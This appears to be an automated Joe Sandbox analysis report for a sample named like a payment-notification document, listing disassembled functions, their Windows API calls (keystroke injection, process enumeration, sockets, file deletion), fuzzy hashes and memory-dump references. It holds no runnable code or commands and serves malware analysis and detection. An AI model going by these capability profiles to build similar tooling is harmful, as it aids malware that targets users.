Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
String ID: %s%d
API String ID: 1272988791-1110647743
Opcode ID: 3b202b976d325215b3e3d8ebc8ae80e908124ba3af4fc9479770cd4931ecbecb
Instruction ID: b303d665162da122b7855239dc4149a0b14891e51c7f955261655ee329122907
Opcode Fuzzy Hash: 3b202b976d325215b3e3d8ebc8ae80e908124ba3af4fc9479770cd4931ecbecb
Instruction Fuzzy Hash: E111AFB1600205ABCF157F748C85FEE37AAFFD4318F048079B909EB292DE3099499B60

Function 00975882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 009758C1
SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 009758EE
DrawMenuBar.USER32(?), ref: 009758FD

Strings

0, xrefs: 0097588F

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Menu$InfoItem$Draw
String ID: 0
API String ID: 3227129158-4108050209
Opcode ID: b70e55c367d243d23148d54a3a6927e30e9ffacb0cc462dfd583b36f1907cf6c
Instruction ID: 6c94997b93967bfa33a2e4af37d7ba398b1f5d8a49a9fd1b694d16d287dd8b8a
Opcode Fuzzy Hash: b70e55c367d243d23148d54a3a6927e30e9ffacb0cc462dfd583b36f1907cf6c
Instruction Fuzzy Hash: 44017932504208EFDB609F21D844BAABBB8FF45360F008099FA4DDA161DB708A84AF21

Function 0093D3A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 0093D3BF
FreeLibrary.KERNEL32 ref: 0093D3E5

Strings

X64, xrefs: 0093D2A8
GetSystemWow64DirectoryW, xrefs: 0093D3B9

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: GetSystemWow64DirectoryW$X64
API String ID: 3013587201-2590602151
Opcode ID: 134b892a42bb18fbb2cb83b23dce0020e0eb98eb7fdc5dc19ba9338d48214a0e
Instruction ID: 79059795b4d3256436d6ec76e1ce3b3fbdc4a4db29ce02244dcfb01a1cf53a98
Opcode Fuzzy Hash: 134b892a42bb18fbb2cb83b23dce0020e0eb98eb7fdc5dc19ba9338d48214a0e
Instruction Fuzzy Hash: F9F055B690BB218BD37112206C38AAE3359AF00705F988429F916E2045EB20CE80CEC2

Function 0094007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c08788c1616eee6f559080739ba74115317d1da74d2ee4bc3372bb30bf9fb50
Instruction ID: 6f4455df1ddaa773d6f3347347a11d1769cea07ca7f0176ffa878d7175a9755b
Opcode Fuzzy Hash: 2c08788c1616eee6f559080739ba74115317d1da74d2ee4bc3372bb30bf9fb50
Instruction Fuzzy Hash: 9FC14C75A0020AEFDB14CFA4C894EAEBBB5FF88704F108598E615EB251D771ED41DB90

Function 00913E80 Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00913F0B
__alldvrm.LIBCMT ref: 0091410C
__alldvrm.LIBCMT ref: 0091412E

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 190bec492484a18a97fe5f025dcdb3e473ceac46589bc02d4dbe4f94f5be8f6e
Instruction ID: 6987746c2fa5abe8163f56348689659d9ad3bffef2560c04cc6ae534b07079b0
Opcode Fuzzy Hash: 190bec492484a18a97fe5f025dcdb3e473ceac46589bc02d4dbe4f94f5be8f6e
Instruction Fuzzy Hash: 55A11672F0438AAFEB158F19C8917EABBF9EF69350F14416DE5959B281C23889C2C750

Function 0096342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00963459
CoUninitialize.OLE32 ref: 00963463
VariantInit.OLEAUT32(?), ref: 0096346E
VariantClear.OLEAUT32(?), ref: 0096371B

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Variant$ClearInitInitializeUninitialize
String ID:
API String ID: 1998397398-0
Opcode ID: fc58a562cc6c689ef1677ba1943ae8c353a67cfb391a291118556b6951d926a8
Instruction ID: ecac808ce0df68c75a58b93e2774b1c73534628f298cb2c65074fdefdf8aa075
Opcode Fuzzy Hash: fc58a562cc6c689ef1677ba1943ae8c353a67cfb391a291118556b6951d926a8
Instruction Fuzzy Hash: DAA116756047009FC710DF29C985A2AB7E9FF89714F048859F98ADB362DB30EE05CB92

Function 00940436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,0097FC08,?), ref: 009405F0
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,0097FC08,?), ref: 00940608
CLSIDFromProgID.OLE32(?,?,00000000,0097CC40,000000FF,?,00000000,00000800,00000000,?,0097FC08,?), ref: 0094062D
_memcmp.LIBVCRUNTIME ref: 0094064E

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: 6a6cff8cb18c1f6a890a69f8b3985efdef4c7a6cb33c7e21c4878febcb0ba6fd
Instruction ID: d7a443dfd0a0f255739ba4871becaefedcd52c51e39ba9ba7696ab9cc0501251
Opcode Fuzzy Hash: 6a6cff8cb18c1f6a890a69f8b3985efdef4c7a6cb33c7e21c4878febcb0ba6fd
Instruction Fuzzy Hash: 8281F975A00109EFCB04DF94C984EEEB7B9FF89315F204598F606AB250DB71AE46CB61

Function 00921391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 009214C0

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 8cd172302c2ba53d20598fd0976e3db2a8b55795d44cbd0d84287f16eebc19be
Instruction ID: 26edc3317f2c714eba2aa19562f741a4caab0168c32c480b54107ddb10fa17b7
Opcode Fuzzy Hash: 8cd172302c2ba53d20598fd0976e3db2a8b55795d44cbd0d84287f16eebc19be
Instruction Fuzzy Hash: CD416C31A00125AFDB357BFDBC45BBE3AA8EFE1370F144226F42CD61E5E63449A152A1

Function 00976278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(0199F7A8,?), ref: 009762E2
ScreenToClient.USER32(?,?), ref: 00976315
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00976382

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: c29f466e4ac074ea2a55d9ed15847792385ba33239d31335fbbeb257a57a3b38
Instruction ID: f6ad3acf272682f561cce66a65d2e39598ff34eb2fc385d739145ff26a36f0c5
Opcode Fuzzy Hash: c29f466e4ac074ea2a55d9ed15847792385ba33239d31335fbbeb257a57a3b38
Instruction Fuzzy Hash: 8B514C72A00649AFCF14DF68D980AAE7BB9FF85360F108259F819972A0D730ED81DB50

Function 00961AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00961AFD
WSAGetLastError.WSOCK32 ref: 00961B0B
#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00961B8A
WSAGetLastError.WSOCK32 ref: 00961B94

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: ErrorLast$socket
String ID:
API String ID: 1881357543-0
Opcode ID: 1b9efd61b95ed3a13337afde917d322704a139b11386abfcfbdf3eb636675305
Instruction ID: 70146b392454769c4e944f3344cadceeeafd5ffa5ed7667d09ac0e33424323b3
Opcode Fuzzy Hash: 1b9efd61b95ed3a13337afde917d322704a139b11386abfcfbdf3eb636675305
Instruction Fuzzy Hash: 2D419075600200AFE720AF39C886F2A77E5EB45718F588458FA1A9F3D3D772DD428B91

Function 0091B41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58bba937667f69e834bffe38574f8391edf13e5b4d3da64c8287ba8adb51399e
Instruction ID: 9d3145677659bca4cd52a5085324674074f963cae57e7d1794f7c68c536ba48d
Opcode Fuzzy Hash: 58bba937667f69e834bffe38574f8391edf13e5b4d3da64c8287ba8adb51399e
Instruction Fuzzy Hash: 0D410871B00318AFD724AF78CC41BAABBEAEBC8710F10852EF156DB6D1D77199918790

Function 009556D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00955783
GetLastError.KERNEL32(?,00000000), ref: 009557A9
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 009557CE
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 009557FA

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 3ad9a2523867e59c2c60a6a0896506ace67c3628a291241bd61a1241aff81c00
Instruction ID: 21e83da1695cfd5f498cde62c5b9eb4f9271431bd57f210d2cce71045818fa54
Opcode Fuzzy Hash: 3ad9a2523867e59c2c60a6a0896506ace67c3628a291241bd61a1241aff81c00
Instruction Fuzzy Hash: 7C412D35600A50DFCB11DF1AC444A1EBBE5FF89321B198488ED5A9B362CB34FD45CB91

Function 0091D8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,00906D71,00000000,00000000,009082D9,?,009082D9,?,00000001,00906D71,8BE85006,00000001,009082D9,009082D9), ref: 0091D910
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0091D999
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0091D9AB
__freea.LIBCMT ref: 0091D9B4

Part of subcall function 00913820: RtlAllocateHeap.NTDLL(00000000,?,009B1444,?,008FFDF5,?,?,008EA976,00000010,009B1440,008E13FC,?,008E13C6,?,008E1129), ref: 00913852

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 0c48abd95cf552bcb5e718d5e18b60ab45ace04d88d810477af643eace62501c
Instruction ID: c30ff670d3e7fec24622388258bba52c394b7fd1418eec9d5e3f7d959e8db187
Opcode Fuzzy Hash: 0c48abd95cf552bcb5e718d5e18b60ab45ace04d88d810477af643eace62501c
Instruction Fuzzy Hash: 3A31AD72B1221AABDF249F65DC45EEE7BA9EB41710B054168FC04D6290EB35DD90CBA0

Function 009752C1 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001024,00000000,?), ref: 00975352
GetWindowLongW.USER32(?,000000F0), ref: 00975375
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00975382
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 009753A8

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: LongWindow$InvalidateMessageRectSend
String ID:
API String ID: 3340791633-0
Opcode ID: 41365cf2628503d12793a1f55a192cc0e82ca2b0ff640502661941349242ebfc
Instruction ID: 709dca058d738d3262a8f41ff499b206a5cf2450fd416bf531b8640dc12ac0ba
Opcode Fuzzy Hash: 41365cf2628503d12793a1f55a192cc0e82ca2b0ff640502661941349242ebfc
Instruction Fuzzy Hash: BF31E432B55A08EFEB749A14CC56BE83769AB043D0F598505FA18961F0C7F5AD80EB41

Function 0094AB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 0094ABF1
SetKeyboardState.USER32(00000080,?,00008000), ref: 0094AC0D
PostMessageW.USER32(00000000,00000101,00000000), ref: 0094AC74
SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 0094ACC6

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 036213c1031dfdddbf7a0a59a3837537220e30a1586b0d6c6ce2e820f7581468
Instruction ID: b59e71ed9ee1e18c2cb82873712a14425da008cc925beccc842d42b44cb6cf40
Opcode Fuzzy Hash: 036213c1031dfdddbf7a0a59a3837537220e30a1586b0d6c6ce2e820f7581468
Instruction Fuzzy Hash: EB313570A84319AFEF34CB658C84FFE7BA9AB89312F04471AE4C5931D0C3798D819792

Function 00977674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 0097769A
GetWindowRect.USER32(?,?), ref: 00977710
PtInRect.USER32(?,?,00978B89), ref: 00977720
MessageBeep.USER32(00000000), ref: 0097778C

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 2398558f3b9e71276d817cd3f5b2c66853d143082f007aee5cbaf8581401d097
Instruction ID: f48a8323bf33ebe074cf6054f051a75c84be3a448517bf5bf871732f5a14a93a
Opcode Fuzzy Hash: 2398558f3b9e71276d817cd3f5b2c66853d143082f007aee5cbaf8581401d097
Instruction Fuzzy Hash: 8741AD36609255EFCB09CF98D894EA9B7F5FB49314F1481A8E418DB261C330A941DF90

Function 009716DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 009716EB

Part of subcall function 00943A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00943A57
Part of subcall function 00943A3D: GetCurrentThreadId.KERNEL32 ref: 00943A5E
Part of subcall function 00943A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,009425B3), ref: 00943A65

GetCaretPos.USER32(?), ref: 009716FF
ClientToScreen.USER32(00000000,?), ref: 0097174C
GetForegroundWindow.USER32 ref: 00971752

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 7cd6a3dd966574fb99a64b82a545b779eb080a4328275a09736ce879dfee0c08
Instruction ID: 91bd04c14affa14c1718ffaa3ed09077244aa6040641703d36e92ec6fcffcfe0
Opcode Fuzzy Hash: 7cd6a3dd966574fb99a64b82a545b779eb080a4328275a09736ce879dfee0c08
Instruction Fuzzy Hash: 41313072D00149AFC704DFAAC881DAEB7FDFF49304B548069E415E7211EA31DE45CBA1

Function 0094D4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0094D501
Process32FirstW.KERNEL32(00000000,?), ref: 0094D50F
Process32NextW.KERNEL32(00000000,?), ref: 0094D52F
CloseHandle.KERNEL32(00000000), ref: 0094D5DC

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: c31f6f7d159e75da9082e11babd8f9de8413f67a765ab442ba8dab2af72469a5
Instruction ID: 2061983c3a9cb624577068aae2c3461ab83a0aa378723831d8c5fe8342693896
Opcode Fuzzy Hash: c31f6f7d159e75da9082e11babd8f9de8413f67a765ab442ba8dab2af72469a5
Instruction Fuzzy Hash: FF317E721082409FD304EF54C881EAFBBE8FF9A354F54092DF585861A1EB71AA85CB93

Function 00978FC9 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 008F9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 008F9BB2

GetCursorPos.USER32(?), ref: 00979001
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00937711,?,?,?,?,?), ref: 00979016
GetCursorPos.USER32(?), ref: 0097905E
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00937711,?,?,?), ref: 00979094

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
